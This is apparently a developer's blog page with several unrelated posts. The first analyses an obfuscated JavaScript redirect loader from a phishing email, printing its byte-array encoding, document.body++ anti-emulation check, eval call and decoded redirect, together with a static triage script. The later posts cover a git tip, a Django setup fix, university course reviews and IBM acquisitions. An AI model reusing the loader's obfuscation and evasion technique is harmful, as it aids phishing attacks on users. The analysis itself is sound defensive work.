Malicious JavaScript snippet

I got this snippet in an HTML file attached to a phishing email.

d=document;a=[0x78,0x63,0x74,0x33,0x7f, etc...];for(i=0;i<a.length;i++){a[i]-=2;}
try{d.body++}catch(q){zz=0;}try{zz&=2}catch(q){zz=1;}
if(!zz)eval(String.fromCharCode.apply(String,a));

I’ve reformatted and annotated it for readability.

// hide redirect as ascii bytes
a = [0x78,0x63,0x74,0x33, etc...];

// "decrypt" our malicious code
// maybe this is good enough to defeat filters looking for encoded redirects?
for (i = 0; i < a.length; i++) {
    a[i] -= 2;
}

// detect if we're in a real browser
try {
    // throws exception because you can't increment a node
    document.body++;
} catch(e) {
    // running in a real browser
    notInBrowser = 0;
}

try {
    // this throws an exception if we didn't throw an exception above
    // (notInBrowser will be undefined)
    notInBrowser &= 2;
} catch(e) {
    notInBrowser = 1;
}
// if we are in a browser, do the redirect
// remember 0 == false and 1 == true 
if (!notInBrowser) {
    eval(String.fromCharCode.apply(String,a));
}

The decrypted code fed to the eval:

var1=49;
var2=var1;
if(var1==var2) {document.location="http://[redacted]:8080/forum/links/column.php";}
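
The decoding step can be reproduced without running the attachment. The following is an added example, not part of the original post: a static triage function that reads the numeric array and the shift out of the script text, reverses the shift, and reports any URL in defanged form. The sample string is constructed to match the snippet's shape with a harmless payload and a reserved `.invalid` hostname; `triage`, `defang`, `SAMPLE` and the report field names are assumptions.

```javascript
// Added example: static triage of the "numeric array, shift, eval" pattern.
// The script text is only read with regular expressions; nothing is eval'd.

// Constructed sample with the same shape as the attachment. The bytes decode
// (after subtracting 2) to: location="http://a.invalid/"
const SAMPLE =
  'd=document;a=[0x6e,0x71,0x65,0x63,0x76,0x6b,0x71,0x70,0x3f,0x24,' +
  '0x6a,0x76,0x76,0x72,0x3c,0x31,0x31,0x63,0x30,0x6b,0x70,0x78,0x63,' +
  '0x6e,0x6b,0x66,0x31,0x24];for(i=0;i<a.length;i++){a[i]-=2;}' +
  'try{d.body++}catch(q){zz=0;}try{zz&=2}catch(q){zz=1;}' +
  'if(!zz)eval(String.fromCharCode.apply(String,a));';

// A hex or decimal integer literal.
const NUM = '(?:0x[0-9a-f]+|\\d+)';
// An array literal holding at least two numbers and nothing else.
const ARRAY_RE = new RegExp(
  '\\[\\s*(' + NUM + '(?:\\s*,\\s*' + NUM + ')+)\\s*\\]', 'i');
// An in-place shift of each element, e.g. a[i]-=2 or a[i]+=5.
const SHIFT_RE = new RegExp(
  '\\[\\s*\\w+\\s*\\]\\s*([-+])=\\s*(' + NUM + ')', 'i');

// Make a URL safe to paste into a ticket or report.
function defang(url) {
  return url.replace(/^http/i, 'hxxp').replace(/\./g, '[.]');
}

function triage(src) {
  const report = {
    // document.body++ style check used to tell a browser from an emulator
    antiEmulation: /\.body\s*\+\+/.test(src),
    // eval(String.fromCharCode...) on a numeric array
    evalOfCharCodes: /eval\s*\(\s*String\.fromCharCode/.test(src),
    shift: 0,
    decoded: null,
    urls: [],
  };

  const arr = ARRAY_RE.exec(src);
  if (!arr) return report; // no numeric array, nothing to decode

  const shift = SHIFT_RE.exec(src);
  if (shift) {
    report.shift = (shift[1] === '-' ? -1 : 1) * Number(shift[2]);
  }

  // Apply the same shift the loader would, but only to build a string.
  report.decoded = arr[1].split(',')
    .map(tok => String.fromCharCode(Number(tok.trim()) + report.shift))
    .join('');

  const found = report.decoded.match(/https?:\/\/[^\s"'<>)]+/gi) || [];
  report.urls = found.map(defang);
  return report;
}

console.log(triage(SAMPLE));
```

Run against a full copy of an attachment like the one above, the function returns the decoded redirect as text, so no browser ever visits the URL.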

I’m not sure what was at the URL. It was probably a phishing page or a browser exploit. If anyone can explain why they used a second try-catch instead of an if-statement, let me know.

This guy has a similar post that explains the document.body++.
http://jeffreysambells.com/2012/12/12/anatomy-of-a-hack

Exclude a file from a git commit

I need to do this about once a week.

git update-index --assume-unchanged path/to/file.txt

git commit -a -m "MOBILE-1234: changed a bunch of files but excluded that one I'm saving for later."

git update-index --no-assume-unchanged path/to/file.txt

If you change 10 files but you only want to commit 9 this will do the trick.

TODO: Complete this git tutorial that blew up on HN a while back. http://pcottle.github.com/learnGitBranching/

Run Django from IntelliJ IDEA on OSX with MySQL

If you try to run a Django app from within IntelliJ using MySQL as the storage backend, you might get the following error.

django.core.exceptions.ImproperlyConfigured: Error loading MySQLdb module: dlopen(/Library/Python/2.7/site-packages/MySQL_python-1.2.4b4-py2.7-macosx-10.7-intel.egg/_mysql.so, 2): Library not loaded: libmysqlclient.18.dylib Referenced from: /Library/Python/2.7/site-packages/MySQL_python-1.2.4b4-py2.7-macosx-10.7-intel.egg/_mysql.so
 Reason: image not found

You’re missing the DYLD_LIBRARY_PATH environment variable.
In IntelliJ, go to “edit configurations”, and add this:
DYLD_LIBRARY_PATH=/usr/local/mysql/lib/

Major: Computer Engineering

I recently received a degree in Computer Engineering from the University of Texas. It was a long time coming.

Here’s a rundown of every course I took at UT. This may be helpful if you’re considering attending UT or trying to pick your major.

E E 306 INTRODUCTION TO COMPUTING
302 and 306 are the very first courses designed to get you interested in either electrical or computer engineering. This course confirmed what I already knew: I like computers. The curriculum employs a bottom-up approach designed to take away the magic of computing. If you’re lucky, you’ll get the venerable Yale Patt.

E E 302 INTRO ELECTRICAL ENGINEERING
306’s dual course is a light introduction to circuits. You’ll learn KVL loops and Thevenin equivalences. In a perfect world this would be the only required EE course for CE majors.

M 408D SEQ, SERIES, AND MULTIVAR CALC
Multivariable calculus is a solid math course. I’m generally pretty bad at mathematics, but I appreciated this one. It picks up where AP BC calculus left off.

C C 304C INTRO TO THE NEW TESTAMENT
I’m thankful my family never forced me to go to church, but I did miss out on some culturally important narratives and biblical themes. You’d be surprised at how many little turns of phrase come from Jesus quotes. The course was worthwhile.

M 427K ADV CALCULUS FOR APPLICATNS I
So differential equations are the foundation for several types of engineering. I appreciate the idea, but I had a hell of a time grokking them. The math department has some terrible teachers. Use MyEdu before taking a lower division math course.

PHY 103N LABORATORY FOR PHY 303L
This lab course is attached to PHY 303L. It’s an exercise in tedium and divining meaning from an unclear instruction manual. The lab TA was a dick until the last day when he handed out the course evaluations. Nobody was fooled.

E E 312 INTRODUCTION TO PROGRAMMING
This course gets you started with C and a little tiny bit of C++ in the last week or so. There’s a good amount of pointer tricks and doing clever tricks with the stack. It’s stuff you wouldn’t normally do, but it’s good for demonstrating an understanding of the mechanics of activation records. Remember that scene from The Matrix Reloaded where Smith creates a bunch of clones of himself? The professor played that clip to explain recursion. “Neo is the base case,” he said.

PHY 303L ENGINEERING PHYSICS II
The single biggest mistake I made in my academic career was not testing out of this course with the Electricity and Magnetism AP test. The physics professors are notoriously bad teachers. If you take it upon yourself to learn physics on your own in high school, you will likely be better off.

E E 411 CIRCUIT THEORY
The professor for this course flew in from California every Monday and Wednesday to teach it. Most lectures were accompanied by a story about Bob Widlar’s drunken antics. This course is probably unnecessary for Software Engineers.

E E 316 DIGITAL LOGIC DESIGN
Logic Design is an important course. It’s a light introduction to things like muxes, adders, and VHDL. I would recommend it for software engineers because it forces you to think about playing with bits in clever ways.

E E 322C DATA STRUCTURES
This course is tied for first place with Algorithms. Students call it “Java”, but it’s much more. You’ll implement linked lists, hash tables, and all kinds of trees.

M 325K DISCRETE MATHEMATICS
This is the one math course I actually enjoyed. The teacher was a lecturer, not a professor of any sort. But she was possibly the best teacher I had at UT. The course is full of proofs, but they’re totally manageable. For any question they throw at you, you’ll only have a few tools in your toolbox so you won’t get stuck for long.

E E 319K INTRO TO EMBEDDED SYSTEMS
This course is definitely the most fun. You basically hack away on microcontrollers. The lab section is a series of miniprojects that you show off to a lab TA. When I took it they were using the Freescale 9s12DP512, but they’ve since switched to an ARM architecture of some sort.

E E 333T ENGINEERING COMMUNICATION-W
This course involves several papers and a powerpoint presentation. You’ll learn that many people are terrible writers and even worse speakers. This course is for them. It should be an easy A, but the groups are paired randomly, so you’ll have to have some team cohesion. And that’s probably part of the lesson.

E E 313 LINEAR SYSTEMS AND SIGNALS
You could call this course “Applied differential equations”. Not my cup of tea. But if you like analog stuff this may be for you. Dr. Hall owns an audio company and demos the tech at some point.

E E 438 ELECTRONIC CIRCUITS I
This is the only course I didn’t finish. Halfway through the semester the ECE department released a new course catalog with a more specialized track for Computer Engineers. I used a Q-drop (penalty-free mechanism for quitting), but not before completing most of the circuit design labs.

E E 360C ALGORITHMS
This is the big papa of software courses. Learn them, love them.

E E 351K PROBABILITY & RANDOM PROCESSES
This is known as one of the more difficult courses in the curriculum, but it definitely should be in the curriculum. Part of the issue for my class was that the professor (Vikalo) was teaching it for the first time and he was a master of the subject. The best math professors can teach it to you like you’re five. That said, I’ll probably end up using some of the Bayesian stuff eventually.

M 340L MATRICES AND MATRIX CALCULATNS
Dr. Arlo Schurle is likely the best math professor at UT and he makes Linear Algebra a cakewalk.

ARH 339M AMERICAN ART SINCE 1960
This is a good course if you like art or think you might like art, but I wouldn’t want to make it my major. Be prepared to memorize the year, artist, and media for about 250-300 works of art.

UGS 302 CIV SOCTY IN POSTCOLONL STATES
This one was a gem. The course examined the influence of Tocquevillian associations in the Middle East and North Africa. The best part: I took it the semester before the Arab Spring. Nobody saw it coming.

E E 445L MICROPROCESSOR APPLICS AND ORG
This top-tier course picks up where 319k left off with more advanced mini-projects on the 9s12. For the final project, you design a PCB and get it fabricated. My project was a handheld pong console. I’ll never forget debugging the system with a multimeter and finding a dead wire in the middle of that fucking ribbon cable. These two microcontroller courses are almost completely architected by Valvano.

E E 364D INTRO TO ENGINEERING DESIGN
364D constitutes part one of “senior design”. You form your group and select your project from a list of projects provided by industry sponsors. This stage is all about process and planning. You write a series of very similar papers and design plans, but don’t really build anything. The single most important lesson from this class is that you should only take on group members that you trust 100%. If you’re on the fence about somebody, just say no. That temporary pain you feel from rejecting someone is well worth the year of agony brought on by an incompetent team member.

M 348 SCI COMPUTATION IN NUM ANLY
This course was such a letdown. I had hoped to learn MATLAB or R, but instead we implemented numerical methods in C++. Even worse, the programming component was actually very small. The vast majority of the time was spent working traditional math problems. But, it is kind of cool to learn the algorithms used by your graphing calculator.

E E 372N TELECOMMUNICATION NETWORKS
The professor, Scott Nettles, is a good teacher and a chill dude. He takes you through the basics of networking from bits on a wire up through BGP and IPv6. The course is a mixed undergraduate/graduate course, but undergrads are spared from the x-kernel labs.

E E 155 ELECTRICAL/COMPUTER ENGR SMNR
I needed an extra hour to get the requisite number of hours required by the 2010-2012 catalogue. This seminar features a new guest speaker faculty member from the ECE department every week. Professors spoke about their research into metamaterials, automatic program transformations, medical devices, and autonomous vehicles to name a few.

GOV 312L AMERICAN GOVERNMENT (Credit by Exam)
I avoided government entirely at UT by claiming AP test credit and taking US government from ACC online. I did this because I wanted to have more time to focus on my other technical courses. I regret it a little bit. My roommate fulfilled 312L with a course on Mexican government that sounded extremely interesting.

E E 360F INTRO TO SOFTWARE ENGINEERING
Nearly everyone blows off this course which is a huge shame. They will pay for it later. The textbook is Mythical Man Month, and there are a variety of papers assigned as reading. The content itself is reasonably interesting, but Perry manages to suck the life out of it in lecture.

E E 464K SENIOR DESIGN PROJECT
The second semester of senior design is more substantial in that you actually build the product. But for the most part, it’s more of the same: long hours spent editing papers with five authors. The key to success here is real time collaborative editing using Google Docs while talking over Skype.

R M 357E INTRO TO RISK MANAGEMENT
I took a rare chance to get a formal background in finance. This course covers many different types of insurance, something that most people never get any exposure to. The professor I had, Patricia Arnold, takes attendance (?!), but is seriously passionate about insurance which helps drive lectures about a traditionally dry subject matter.

E S 377 INTERDISCIPLNRY ENTREPRENRSHP
1 Semester Startup is positioned to be the killer app for UT. I was fortunate enough to get DebateTab into the very first class. Josh Baer and Bob Metcalfe are solid resources who really want to help. If you take this class, the limiting agent will be yourself and your team’s commitment to school. It’s hard to convince someone to hack when he’s struggling with a math course. You also can’t be upset when your cofounders who are in the country on student visas get hired by Microsoft and Salesforce.

E E 360T SOFTWARE TESTING
This class is important, but it won’t make you a great test writer. The goal is to cover as many types of testing as possible from the Ammann & Offutt text. It begins with JUnit basics and proceeds to survey graph coverage, logic coverage, input space partitioning, and syntax-based testing. The homework assignments with the JPF model checker were some of the strangest, but most interesting assignments I’ve had.

E E 461L SOFTWARE ENGR AND DESIGN
This is the new software lab that’s supposed to prepare you for the real world with JUnit, bash, svn, ant, UML diagrams, and Hoare logic. The course falls short because it’s disorganized and no substitute for teaching yourself. But, it’s better than nothing if you’ve never used anything listed in the previous sentence.

E E 360P CONCURRENT AND DISTRIBUTED SYS
This is where Vijay Garg really shines. His teaching style involves setting up a problem, asking students to solve it, and then pulling them forward through the history of solutions. The key here is that he doesn’t linger so long that you lose focus. After taking this course you will be a much better programmer. Concurrency is one of those topics that you just don’t pick up from “Learn PHP in 24 hours”.

A week before graduation I learned that I would be awarded a double major (in electrical engineering) which was surprising because I intended to only major in computer engineering. Apparently you can’t major solely in CE.

Courses I should have taken

If I had an extra year I would definitely take the following courses. I probably could have found space for them if I’d planned better or worked harder, but hindsight’s 20/20.

E E 460N COMPUTER ARCHITECTURE
This is considered the most difficult and the most time consuming course in ECE. But it may be the most instructive of all. Chiou, who teaches it, says:

Prof. Patt, who is one of the world’s leading computer architects, designed the class.  It covers about 80% of what I studied in a graduate computer architecture classes at MIT (6.823.)

The quote says a lot because all the descriptions of MIT coursework I’ve read make it sound twice as rigorous as anything I took at UT. The problem sets from 2011 are available on Patt’s site.

EE445M EMBEDDED AND REAL TIME SYSTEMS LAB
445M is the most involved embedded systems course you can take as an undergraduate, mainly because you write your own operating system. From the course description:  implementation of multitasking, synchronization, protection, and paging; operating systems

E E 125S INTERNSHIP IN ELEC & COMP ENGR
You can claim one hour of credit for having an internship related to your major. My two years at IBM would have qualified, but I was too lazy to get the paperwork signed. It would have been a hassle because my manager was in Raleigh.

A smarter or more motivated person could easily finish this program in less than 4 years. I don’t regret taking my time, though. College is worth savoring, especially at UT.

Why not CS?

I avoided Computer Science because most of the descriptions I read made the discipline sound heavy on math and theory, and lighter on actual hacking. Formal proofs are difficult and boring for me, so I chose engineering. In retrospect, I’m not sure that this was the right choice because there’s a good amount of freedom within a degree plan.

If you major in computer engineering, you’ll constantly be referred to as a CS or EE major. I found this to be irksome because I made a conscious choice to get an engineering degree, but I also don’t care for circuits. But you can’t really let this get to you because the degrees are functionally equivalent in the workplace. This is justified because neither department is stupid. The CS department is well aware that you need to learn some assembly and logic design and the ECE department ensures that you know how to analyze big-O complexity of an algorithm. You’ll be in good shape either way. And if you know that you just want to build webapps, you might consider CS because you’ll have a better chance of meeting web hackers. I can count the number I met in ECE on two hands.

Aftermath

During my senior year I interviewed at four software companies and received four job offers. I started work at Indeed in June. If you want one of the more engaging programming jobs, you can’t just write code for class. You can either A) be really really smart, or B) be someone who spends a lot of time building cool stuff. Go to Hacker Lounge to meet people who are both.

How to get your startup acquired by IBM

IBM as we know it now has been absorbing other companies since the early 1900s. The first IBM-related acquisition happened in 1899 when IBM precursor Bundy Manufacturing bought a company that made time clocks. As a reference point, that sale happened 34 years after the end of the Civil War. Since then, Big Blue has acquired a staggering number of firms, including 47 since 2008[1].

So if you’re looking for an exit, it wouldn’t hurt to see what kind of firms big enterprises are interested in. So how can we characterize those 47 acquisitions made from 2008 to today?

Virtually all of them are software companies

This isn’t surprising. By now, most people are familiar with IBM’s reinvention as a software and services company. Tom Friedman devotes a few paragraphs to the metamorphosis in The World is Flat. Making the World Work Better, the IBM book given to every employee, belabors the point.

Literally all of them have B2B business models.

Business!

“A million people walk into a bar in Silicon Valley. Nobody buys anything. The bar is declared a huge success.”

Again, enterprise software and services are IBM’s bread and butter. While people joke about the valley celebrating SoLoMo companies that don’t make any money, enterprise software firms have been laughing all the way to the bank.

Anecdotally, I’ve noticed that some IBM products aren’t really the best available or the most user friendly. Anyone who’s used NetInsight or Lotus Notes can attest to that. Perhaps this is just a symptom of enterprise software in general: You don’t have to have the best product, you just need to convince a bunch of companies they need you. The enterprise market is ostensibly ridden with friction and inefficiency. After the sale is made, the product just has to do what it says on the box halfway decently. It doesn’t really matter if it’s slow and unintuitive. I’d really like to see UX lessons learned from bubblegum web startups osmose into the b2b domain [2].

The average age at acquisition is 13.5 years

IBM buys established, profitable companies that have a lot of traction. These companies don’t look like they were “built to flip”. There is a very real, proven demand for the products or services.

60% are from the US. Of those 29, 8 are from Massachusetts and 8 are from Silicon Valley.

It’s not surprising that Silicon Valley is well represented, but the Bay Area hardly has a monopoly. Only 17% of all companies acquired since 2008 were from the Valley.

Massachusetts is home to MIT, Harvard and about 100 smaller schools. And local VC’s have a reputation for funding companies selling to big business.

Of the “rest of the world” group, Israel is well represented. Haifa is known as a tech engine and IBM has a large research presence at the University of Haifa.

In the next 20 years expect to see acquisitions from BRIC nations. India and China are producing very high numbers of engineering students with graduate degrees. The oft repeated argument that “they aren’t as innovative as us” is going to look pretty silly by 2030. The biggest reason we haven’t seen any BRIC acquisitions so far is because of the long incubation time mentioned above. Many of the companies in emerging markets that IBM will acquire have likely already been founded.

This post wouldn’t be complete without mentioning Austin. Since 2008 IBM’s only Austin acquisition was the 2009 purchase of Lombardi Software. Former Lombardi CEO Rod Favaron is now at Spredfast, a company worth mentioning because a) they do social for enterprise and b) they gave me a T-shirt. Note that both companies came out of ATI, a UT partnership with the private sector.

And long before Lombardi there was the huge Tivoli merger in 1996. If you have the opportunity to see Frank Moss (former Tivoli CEO) speak, you should take it. He’s an interesting dude. And, strangely enough, he began his career working for IBM Research in Haifa.

The Bottom Line

IBM likes to acquire established enterprise software firms that have been in business for over a decade. Their cities of origin are geographically diverse, but many are characterized by high availability of venture capital and a strong history of academic interaction with the private sector.

You may be able to glean some insight of your own from the Google Doc spreadsheet with all the data:

P.S.:
Cringely just wrapped up a series of posts announcing the imminent downfall of IBM, due in part to its inability to deliver on service agreements. I expect software revenue will continue to grow and mitigate failures of global services. Cringely is pessimistic about all the software buys and doesn’t believe that IBM can turn new software products into billion dollar business. I disagree. The companies that IBM bought were profitable. There are enough smart people [3] at IBM to figure out how to assemble halfway decent software products into coherent packages that can be sold by a proven sales force.

Update 3/23/2013: @miquelcamps has done some analysis of Crunchbase acquisition data. IBM is listed as the 4th largest acquirer behind Cisco, Microsoft, and Google.

[1] Most of the data in this post comes from Crunchbase and Wikipedia.
[2] Mixpanel appears to be doing this. And Palantir claims to bring Silicon Valley level software to government.
[3] I just wrapped up a 2 year internship in IBM’s developerWorks.